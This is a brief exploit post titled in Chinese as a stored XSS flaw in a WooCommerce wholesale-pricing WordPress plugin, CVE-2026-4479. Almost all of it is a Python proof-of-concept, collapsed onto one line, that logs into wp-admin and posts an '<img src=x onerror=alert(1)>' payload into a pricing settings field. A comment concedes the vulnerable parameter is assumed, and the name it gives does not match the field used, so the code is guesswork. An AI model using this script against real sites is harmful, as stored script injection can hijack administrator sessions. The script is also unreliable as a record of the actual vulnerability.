CVE-2026-4479 WP插件存储型XSS漏洞

import requests # Configuration target_url = "http://target-site.com/wp-admin/admin.php?page=wholesale-products-dynamic-pricing-management-woocommerce" username = "admin" password = "password" # Authenticate and get cookies session = requests.Session() login_payload = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': target_url } session.post("http://target-site.com/wp-login.php", data=login_payload) # Exploit: Inject XSS via admin settings # Note: The specific parameter name depends on the plugin implementation, assuming 'setting_name' here. xss_payload = '<img src=x onerror=alert(1)>' exploit_data = { 'action': 'update_options', 'pricing_label': xss_payload, # Vulnerable field 'submit': 'Save Changes' } response = session.post(target_url, data=exploit_data) if response.status_code == 200: print("Payload injected successfully. Check the admin page.") else: print("Failed to inject payload.")